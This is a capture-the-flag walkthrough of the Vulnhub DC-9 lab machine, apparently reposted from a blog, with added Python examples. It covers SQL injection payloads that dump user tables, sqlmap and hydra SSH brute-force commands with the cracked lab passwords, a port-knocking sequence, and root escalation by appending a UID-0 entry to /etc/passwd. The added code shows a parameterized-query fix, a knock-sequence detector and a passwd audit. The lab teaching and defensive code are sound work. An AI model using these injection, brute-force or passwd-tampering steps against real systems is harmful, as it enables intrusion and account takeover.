
Vulnhub DC-9 Walkthrough

Posted: 2023-03-05 21:01:29

Recon

First, locate the target with netdiscover; the target's IP address is 192.168.244.135.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
 Currently scanning: 192.168.244.0/24   |   Screen View: Unique Hosts                                                        
 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.244.1   00:50:56:c0:00:08      1      60  VMware, Inc.                                                              
 192.168.244.2   00:50:56:f7:b2:38      1      60  VMware, Inc.                                                              
 192.168.244.135 00:0c:29:e4:f7:0d      1      60  VMware, Inc.                                                              
 192.168.244.254 00:50:56:ed:d6:50      1      60  VMware, Inc.   

Then scan the target with Nmap: port 22 is filtered and port 80 is open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp filtered      ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

SQL Injection

Try visiting the web service.

Test the Search function for SQL injection.

Use order by to guess the column count; the query returns 6 columns.

Confirm the column count with union select.

Retrieve the database name and the current database version.

Retrieve the table names that exist in the current database:

Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#

Read the table's fields:

Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#

After obtaining the usernames and password hashes, crack the hashes and log in through the web interface.
The credentials are admin:transorbital1.
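To show what the injected search above exploits, here is an added example (not code from the page or from the DC-9 VM) that rebuilds the vulnerable lookup and its parameterized fix in Python with SQLite; the table layout and the placeholder hash are constructed, and the page's payload is adapted to SQLite syntax.

```python
import sqlite3

# Constructed stand-in for the DC-9 search page: a 6-column staff table (the
# count the write-up found with ORDER BY) and a Users table with the same
# UserID/Username/Password layout. The hash value is a placeholder.
SCHEMA = """
CREATE TABLE StaffDetails(id INTEGER, firstname TEXT, lastname TEXT,
                          position TEXT, phone TEXT, email TEXT);
CREATE TABLE Users(UserID INTEGER, Username TEXT, Password TEXT);
INSERT INTO StaffDetails VALUES (1,'Fred','Flintstone','Janitor','0000','fred@example.invalid');
INSERT INTO Users VALUES (1,'admin','constructed-hash-placeholder');
"""

def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def search_vulnerable(con, term):
    # Same defect as results.php: the search term is spliced into the SQL text.
    return con.execute("SELECT * FROM StaffDetails WHERE firstname='" + term + "'").fetchall()

def search_parameterized(con, term):
    # Hardened form: the term is bound as a value and can never alter the query.
    return con.execute("SELECT * FROM StaffDetails WHERE firstname=?", (term,)).fetchall()

def probe_column_count(con, max_cols=10):
    # The write-up's ORDER BY step: ORDER BY n fails once n exceeds the column count.
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(con, "Fred' ORDER BY %d--" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None

# SQLite adaptation of the page's UNION payload: '--' replaces '#' as the comment
# marker and the three columns are joined with '||' (group_concat takes one expression).
PAYLOAD = ("Fred' UNION SELECT 1,2,3,4,5,group_concat(UserID||':'||Username||':'||Password)"
           " FROM Users--")

def leaked_credentials(con):
    # Column 2 holds the literal 2 only for the injected row; column 6 carries the dump.
    return [row[5] for row in search_vulnerable(con, PAYLOAD) if row[1] == 2]
```

Running the same payload through search_parameterized returns no rows, because the bound value is compared as text rather than parsed as SQL.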

The "File does not exist" message on the Manage page suggests a file inclusion vulnerability. We try brute-forcing it with Burp Suite.

Note that the payload must not be URL-encoded when sending the request.

We now have usernames, but the SSH port is not open. Under /etc we found /etc/knockd.conf: knockd controls the opening and closing of the SSH port, and according to its configuration SSH only opens after the specified ports are hit in order.

Per the configuration file, knocking on ports 7469, 8475 and 9842 in sequence opens the SSH port. We can knock with nc or nmap.

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
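As an added defender-side example (not from the page), this Python snippet reads constructed iptables-style log lines and reports which source completed the knock sequence 7469, 8475, 9842 in order, resetting on an out-of-order port or an expired window, which is how a knock shows up in firewall logs; the 5-second window and the log line format are assumptions.

```python
import re
from datetime import datetime, timedelta

KNOCK_SEQUENCE = [7469, 8475, 9842]   # openSSH sequence from the target's knockd.conf
SEQ_TIMEOUT = timedelta(seconds=5)    # assumed window; use seq_timeout from the real config

# Constructed iptables-style LOG lines (syslog prefix shortened); not taken from the target.
LOG = """\
Mar  5 06:19:58 dc-9 kernel: IN=eth0 SRC=192.168.244.1 DST=192.168.244.135 PROTO=TCP DPT=7469 SYN
Mar  5 06:19:59 dc-9 kernel: IN=eth0 SRC=192.168.244.1 DST=192.168.244.135 PROTO=TCP DPT=8475 SYN
Mar  5 06:20:00 dc-9 kernel: IN=eth0 SRC=192.168.244.1 DST=192.168.244.135 PROTO=TCP DPT=9842 SYN
Mar  5 06:20:01 dc-9 kernel: IN=eth0 SRC=192.168.244.77 DST=192.168.244.135 PROTO=TCP DPT=7469 SYN
Mar  5 06:20:02 dc-9 kernel: IN=eth0 SRC=192.168.244.77 DST=192.168.244.135 PROTO=TCP DPT=9842 SYN
Mar  5 06:20:03 dc-9 kernel: IN=eth0 SRC=192.168.244.77 DST=192.168.244.135 PROTO=TCP DPT=8475 SYN
"""
LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(\S+) .*?DPT=(\d+)")

def parse(log, year=2023):
    """Turn log lines into (timestamp, src_ip, dst_port) tuples; syslog omits the year."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group(1)), "%Y %b %d %H:%M:%S")
            events.append((ts, m.group(2), int(m.group(3))))
    return events

def completed_knocks(events, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
    """Return [(src, completion_time)] for sources that hit the sequence in order.
    Like knockd, a wrong port or an expired window resets that source's progress."""
    progress = {}          # src -> (index of next expected port, time of first knock)
    hits = []
    for ts, src, port in sorted(events):
        idx, started = progress.get(src, (0, ts))
        if idx and ts - started > timeout:
            idx = 0                               # too slow: start the sequence over
        if port == sequence[idx]:
            if idx == 0:
                started = ts
            idx += 1
            if idx == len(sequence):
                hits.append((src, ts))            # full sequence: knockd would open 22/tcp here
                idx = 0
        else:
            idx = 0                               # out-of-order port: reset
        progress[src] = (idx, started)
    return hits
```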

Brute Force

SSH is now open, but we have no SSH username or password. We try sqlmap to dump the database contents and then brute-force SSH with them. First, save the HTTP request for the injection point to a file.

POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

search=%27or+1%3D1%23

Then dump the table contents with the following command.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump  
······

[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'

Next, process the file contents and run the brute force.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst  

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.244.135   login: janitor   password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08

With the passwords in hand, we try logging in and escalating privileges. None of the three accounts has sudo rights, but the janitor user's home directory contains a hidden file.

janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  5 21:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  5 21:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

We run the brute force again with these passwords.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27

Check the sudo -l privileges.

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

Go to the parent directory of that executable and read the source of test.py.

#!/usr/bin/python

import sys

# Expects exactly two arguments after the script name: a file to read and a file to append to.
if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    # Read the whole source file; no path check, and sudo runs this as root.
    f = open(sys.argv[1], "r")
    output = (f.read())

    # Append it to the destination file, again without any check on the path.
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

From the source, the program takes three arguments, reads the file given as the second and appends it to the file given as the third. So we can craft a user entry with root privileges and write it into /etc/passwd to escalate. First we use the program to read the shadow file and get the entry of a user whose password we already know.

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow 
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::

We modify that entry to the following and save it as /tmp/test.
hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash

Then write it with the test program (use single quotes) and escalate with su (enter janitor's password here).

fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd

fredf@dc-9:/opt/devstuff$ su hacker

After escalating, we obtain the FLAG.
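As an added example, not from the page, a Python audit that flags the kind of /etc/passwd entry appended above: a second UID-0 account, a password hash stored in the passwd field rather than in /etc/shadow, and a UID shared with another account. The passwd excerpt and the hash are constructed.

```python
# Constructed /etc/passwd excerpt (not from the target); the last line has the
# shape of the entry the write-up appends: a second UID-0 account that carries
# a SHA-512 crypt hash in the password field instead of 'x'.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1000:1000:Fred,,,:/home/fredf:/bin/bash
janitor:x:1001:1001::/home/janitor:/bin/bash
hacker:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:0:0:root:/root:/bin/bash
"""

HASH_IN_PASSWD = "password hash in passwd field (bypasses /etc/shadow)"
UID0_NOT_ROOT = "uid 0 account other than root"
EMPTY_PASSWORD = "empty password field"
DUPLICATE_UID = "uid shared with another account"
MALFORMED = "malformed entry"

def audit_passwd(text):
    """Return (line_no, account, finding) tuples for entries that need review."""
    findings = []
    uid_owner = {}                      # uid -> first account seen with that uid
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((n, line, MALFORMED))
            continue
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if pw == "":
            findings.append((n, name, EMPTY_PASSWORD))
        elif pw not in ("x", "*", "!", "!!"):   # assumed: any other value is a hash
            findings.append((n, name, HASH_IN_PASSWD))
        if uid == 0 and name != "root":
            findings.append((n, name, UID0_NOT_ROOT))
        if uid in uid_owner:
            findings.append((n, name, DUPLICATE_UID))
        else:
            uid_owner[uid] = name
    return findings
```

Run against the real file with audit_passwd(open("/etc/passwd").read()); on a clean Debian install the list is empty.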

From: https://www.cnblogs.com/RichardLuo/p/DC-9-WP.html
